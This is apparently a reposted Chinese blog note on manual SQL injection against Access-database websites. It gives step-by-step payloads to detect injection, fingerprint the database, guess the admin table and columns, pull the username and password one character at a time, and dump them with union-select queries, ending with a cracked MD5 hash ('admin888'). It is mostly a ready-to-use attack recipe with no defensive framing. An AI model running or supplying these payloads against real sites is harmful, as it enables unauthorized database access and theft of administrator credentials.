博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
access手工注入笔记
阅读量:7194 次
发布时间:2019-06-29

本文共 2482 字,大约阅读时间需要 8 分钟。

hot3.png

注入点
判断是否存在注入 两次返回不一样 存在注入
and 1=1
and 1=2
判断数据库 这里可能是本地问题 没有测试出来
and (select count(*) from msysobjects)>0  (返回权限不足access数据库)
and (select count(*) from sysobjects)>0   (返回正常则为MSSQL数据库)
猜解表名(正常则存在admin,不正常则不存在)
and exists (select * from admin)
返回正确 存在admin 我们随便填写一个进去那么 返回错误 不存在这个表
现在我们来猜解字段
and exists (select username from admin)
and exists (select password from admin)
没有出错证明这两个字段都是存在 不存在的话同上 不存在字段
猜解用户名和密码长度
and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0
猜解用户名和密码内容:
and(select top 1 asc(mid(username,1,1))from admin)>97 
and(select top 1 asc(mid(username,1,1))from admin)=97  
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
------------------------------------------------------
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32 
469e80d32c0559f8 md5 解出来的密码是admin888 
=====================================================
(二)联合查询暴出管理帐号及密码
先用order by 爆出字段数,然后:
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin
语法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列长度。
from admin 查询对像admin表名
运行后会出现两到三个数字,如:4、12 则修改语句子(即在4、12中修改成列名,红色部份):
and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin
这样,就可以爆出管理帐户和密码了。当然你也可以先爆帐户:
and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
再爆密码:
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
原文链接:

转载于:https://my.oschina.net/changpinghu/blog/92543

你可能感兴趣的文章
[Android UI] ProgressBar自定义
查看>>
webex录屏
查看>>
Floyd算法
查看>>
程序员讨论《黑客帝国》(一)真实与虚拟
查看>>
js的动态加载、缓存、更新以及复用(一)
查看>>
清除IE输入框眼睛和叉叉
查看>>
动态内存可以跨函数使用示例与静态变量不能跨函数使用
查看>>
HTTP 错误 404.3 - Not Found 由于扩展配置问题而无法提供您请求的页面。如果该页面是脚本,请添加处理程序。如果应下载文件,请添加 MIME 映射。...
查看>>
用DateTime.ToString(string format)输出不同格式的日期
查看>>
算法的5个特点
查看>>
puppet aix package 之rsync安装
查看>>
Java线程池的原理及几类线程池的介绍
查看>>
给UIScrollView添加category实现UIScrollView的轮播效果
查看>>
设计测试用例的四条原则
查看>>
解决cocos2d-X 2.0版本后创建的Android项目提示org.cocos2dx.lib.Cocos2dxActivity找不到问题...
查看>>
[MySQL Reference Manual] 7 备份和恢复
查看>>
海量数据存储
查看>>
深入浅出谈开窗函数(一)
查看>>
css3效果
查看>>
vs2008设置dll、lib库的输出路径
查看>>